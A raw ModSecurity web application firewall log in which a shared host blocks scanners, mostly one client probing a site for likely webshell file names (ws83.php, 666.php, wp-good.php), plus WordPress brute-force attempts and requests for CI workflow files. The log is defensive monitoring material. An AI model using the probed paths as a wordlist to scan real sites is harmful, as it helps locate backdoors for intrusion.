[Tue May 26 15:05:19.133691 2026] [security2:error] [pid 678998:tid 679216] [client 20.9.81.163:27826] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/leaf.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpwAAAAFg"]
[Tue May 26 15:05:19.280346 2026] [security2:error] [pid 678998:tid 679220] [client 20.9.81.163:57865] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/grsiuk.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpxwAAAFw"]
[Tue May 26 15:05:19.280459 2026] [security2:error] [pid 678998:tid 679220] [client 20.9.81.163:57865] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/grsiuk.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpxwAAAFw"]
[Tue May 26 15:05:19.476135 2026] [security2:error] [pid 678998:tid 679153] [client 20.9.81.163:48606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/8.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpzAAAABk"]
[Tue May 26 15:05:19.476273 2026] [security2:error] [pid 678998:tid 679153] [client 20.9.81.163:48606] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/8.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpzAAAABk"]
[Tue May 26 15:05:19.630308 2026] [security2:error] [pid 678998:tid 679237] [client 20.9.81.163:47622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/fs.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpzgAAAG0"]
[Tue May 26 15:05:19.630439 2026] [security2:error] [pid 678998:tid 679237] [client 20.9.81.163:47622] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/fs.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdpzgAAAG0"]
[Tue May 26 15:05:19.768486 2026] [security2:error] [pid 678998:tid 679188] [client 20.9.81.163:59266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/ws38.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp1wAAADw"]
[Tue May 26 15:05:19.768592 2026] [security2:error] [pid 678998:tid 679188] [client 20.9.81.163:59266] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/ws38.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp1wAAADw"]
[Tue May 26 15:05:19.859099 2026] [security2:error] [pid 678998:tid 679218] [client 114.119.150.168:37005] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp2AAAAFo"], referer: http://glorodavionics.com/index.php?route=affiliate/forgotten
[Tue May 26 15:05:19.897042 2026] [security2:error] [pid 678998:tid 679164] [client 94.26.106.167:55082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.anujtradingco.com"] [uri "/shop-2/privacy-policy/wp-login.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp1QAAACQ"]
[Tue May 26 15:05:19.937184 2026] [security2:error] [pid 678998:tid 679211] [client 136.243.220.209:48699] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp3AAAAFM"]
[Tue May 26 15:05:19.940870 2026] [security2:error] [pid 678998:tid 679219] [client 20.9.81.163:57912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/a7.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp3QAAAFs"]
[Tue May 26 15:05:19.940993 2026] [security2:error] [pid 678998:tid 679219] [client 20.9.81.163:57912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/a7.php"] [unique_id "ahVpV5-Rl4i_pgT-iAdp3QAAAFs"]
[Tue May 26 15:05:20.038016 2026] [security2:error] [pid 678998:tid 679206] [client 74.249.173.207:5078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/adminfuns.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp4gAAAE4"]
[Tue May 26 15:05:20.156062 2026] [security2:error] [pid 678998:tid 679130] [client 20.9.81.163:13607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/classsmtps.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp4wAAAAI"]
[Tue May 26 15:05:20.156200 2026] [security2:error] [pid 678998:tid 679130] [client 20.9.81.163:13607] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/classsmtps.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp4wAAAAI"]
[Tue May 26 15:05:20.286765 2026] [security2:error] [pid 678998:tid 679168] [client 20.9.81.163:8905] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/amax.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp6QAAACg"]
[Tue May 26 15:05:20.286899 2026] [security2:error] [pid 678998:tid 679168] [client 20.9.81.163:8905] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/amax.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp6QAAACg"]
[Tue May 26 15:05:20.399830 2026] [security2:error] [pid 678998:tid 679160] [client 94.26.106.167:64661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.anujtradingco.com"] [uri "/administrator/"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp8AAAACA"]
[Tue May 26 15:05:20.459523 2026] [security2:error] [pid 678998:tid 679147] [client 20.9.81.163:13580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/CDX1.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp9gAAABM"]
[Tue May 26 15:05:20.459652 2026] [security2:error] [pid 678998:tid 679147] [client 20.9.81.163:13580] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/CDX1.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp9gAAABM"]
[Tue May 26 15:05:20.559785 2026] [security2:error] [pid 678998:tid 679190] [client 74.249.173.207:4633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.yourstorybag.com"] [uri "/wp-good.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp-gAAAD4"]
[Tue May 26 15:05:20.649963 2026] [security2:error] [pid 678998:tid 679165] [client 20.9.81.163:65067] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/rip.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp_gAAACU"]
[Tue May 26 15:05:20.650081 2026] [security2:error] [pid 678998:tid 679165] [client 20.9.81.163:65067] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/rip.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdp_gAAACU"]
[Tue May 26 15:05:20.770257 2026] [security2:error] [pid 678998:tid 679214] [client 20.9.81.163:65052] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "jhonparra.com"] [uri "/1.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdqAAAAAFY"]
[Tue May 26 15:05:20.770380 2026] [security2:error] [pid 678998:tid 679214] [client 20.9.81.163:65052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/1.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdqAAAAAFY"]
[Tue May 26 15:05:20.770490 2026] [security2:error] [pid 678998:tid 679214] [client 20.9.81.163:65052] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/1.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdqAAAAAFY"]
[Tue May 26 15:05:20.925582 2026] [security2:error] [pid 678998:tid 679203] [client 20.9.81.163:59290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/chosen.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdqDAAAAEs"]
[Tue May 26 15:05:20.925716 2026] [security2:error] [pid 678998:tid 679203] [client 20.9.81.163:59290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/chosen.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdqDAAAAEs"]
[Tue May 26 15:05:21.073905 2026] [security2:error] [pid 678998:tid 679174] [client 20.9.81.163:31862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/css.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqEgAAAC4"]
[Tue May 26 15:05:21.074040 2026] [security2:error] [pid 678998:tid 679174] [client 20.9.81.163:31862] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/css.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqEgAAAC4"]
[Tue May 26 15:05:21.240313 2026] [security2:error] [pid 678998:tid 679182] [client 20.9.81.163:59280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/php.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqFgAAADY"]
[Tue May 26 15:05:21.240435 2026] [security2:error] [pid 678998:tid 679182] [client 20.9.81.163:59280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/php.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqFgAAADY"]
[Tue May 26 15:05:21.311460 2026] [security2:error] [pid 678998:tid 679132] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpWJ-Rl4i_pgT-iAdqAwAAAAQ"]
[Tue May 26 15:05:21.422694 2026] [security2:error] [pid 678998:tid 679002] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.github/workflows/build.yaml"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqFwAAdgM"]
[Tue May 26 15:05:21.448327 2026] [security2:error] [pid 678998:tid 679186] [client 20.9.81.163:59280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-Blogs.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqGwAAADo"]
[Tue May 26 15:05:21.448471 2026] [security2:error] [pid 678998:tid 679186] [client 20.9.81.163:59280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-Blogs.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqGwAAADo"]
[Tue May 26 15:05:21.646799 2026] [security2:error] [pid 678998:tid 679152] [client 20.9.81.163:48590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/index.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqJQAAABg"]
[Tue May 26 15:05:21.646912 2026] [security2:error] [pid 678998:tid 679152] [client 20.9.81.163:48590] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-content/index.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqJQAAABg"]
[Tue May 26 15:05:21.772795 2026] [security2:error] [pid 678998:tid 679215] [client 20.9.81.163:13580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqJgAAAFc"]
[Tue May 26 15:05:21.772921 2026] [security2:error] [pid 678998:tid 679215] [client 20.9.81.163:13580] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/beteng88/ws83.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqJgAAAFc"]
[Tue May 26 15:05:21.946536 2026] [security2:error] [pid 678998:tid 679143] [client 20.9.81.163:8950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/ws83.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqKwAAAA8"]
[Tue May 26 15:05:21.946669 2026] [security2:error] [pid 678998:tid 679143] [client 20.9.81.163:8950] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/ws83.php"] [unique_id "ahVpWZ-Rl4i_pgT-iAdqKwAAAA8"]
[Tue May 26 15:05:22.090544 2026] [security2:error] [pid 678998:tid 679231] [client 20.9.81.163:13599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/file61.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqLwAAAGc"]
[Tue May 26 15:05:22.090665 2026] [security2:error] [pid 678998:tid 679231] [client 20.9.81.163:13599] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/file61.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqLwAAAGc"]
[Tue May 26 15:05:22.247315 2026] [security2:error] [pid 678998:tid 679236] [client 20.9.81.163:65046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/sadcut1.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqNQAAAGw"]
[Tue May 26 15:05:22.247417 2026] [security2:error] [pid 678998:tid 679236] [client 20.9.81.163:65046] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/sadcut1.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqNQAAAGw"]
[Tue May 26 15:05:22.382352 2026] [security2:error] [pid 678998:tid 679151] [client 20.9.81.163:47627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/y.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqOwAAABc"]
[Tue May 26 15:05:22.382459 2026] [security2:error] [pid 678998:tid 679151] [client 20.9.81.163:47627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/y.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqOwAAABc"]
[Tue May 26 15:05:22.600808 2026] [security2:error] [pid 678998:tid 679235] [client 20.9.81.163:47652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/666.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqTAAAAGs"]
[Tue May 26 15:05:22.600920 2026] [security2:error] [pid 678998:tid 679235] [client 20.9.81.163:47652] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/666.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqTAAAAGs"]
[Tue May 26 15:05:22.761049 2026] [security2:error] [pid 678998:tid 679232] [client 20.9.81.163:25252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/7.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqVQAAAGg"]
[Tue May 26 15:05:22.761155 2026] [security2:error] [pid 678998:tid 679232] [client 20.9.81.163:25252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/7.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqVQAAAGg"]
[Tue May 26 15:05:22.809646 2026] [security2:error] [pid 678998:tid 679238] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqPwAAAG4"]
[Tue May 26 15:05:22.956356 2026] [security2:error] [pid 678998:tid 679158] [client 20.9.81.163:26545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-config-sample.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqWgAAAB4"]
[Tue May 26 15:05:22.956520 2026] [security2:error] [pid 678998:tid 679158] [client 20.9.81.163:26545] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/wp-config-sample.php"] [unique_id "ahVpWp-Rl4i_pgT-iAdqWgAAAB4"]
[Tue May 26 15:05:23.098034 2026] [security2:error] [pid 678998:tid 679168] [client 91.84.110.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqXQAAACg"], referer: http://anujtradingco.com/pages/services-modern/?unapproved=1260789&moderation-hash=d7bdcf1157a8679968726baf0a5b3747
[Tue May 26 15:05:23.110874 2026] [security2:error] [pid 678998:tid 679179] [client 20.9.81.163:27779] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/log.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqYQAAADM"]
[Tue May 26 15:05:23.110972 2026] [security2:error] [pid 678998:tid 679179] [client 20.9.81.163:27779] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/log.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqYQAAADM"]
[Tue May 26 15:05:23.255224 2026] [security2:error] [pid 678998:tid 679012] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.github/workflows/build.yml"] [unique_id "ahVpW5-Rl4i_pgT-iAdqZQAADw0"]
[Tue May 26 15:05:23.307213 2026] [security2:error] [pid 678998:tid 679169] [client 20.9.81.163:8926] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/a5.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqZgAAACk"]
[Tue May 26 15:05:23.307343 2026] [security2:error] [pid 678998:tid 679169] [client 20.9.81.163:8926] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "jhonparra.com"] [uri "/a5.php"] [unique_id "ahVpW5-Rl4i_pgT-iAdqZgAAACk"]
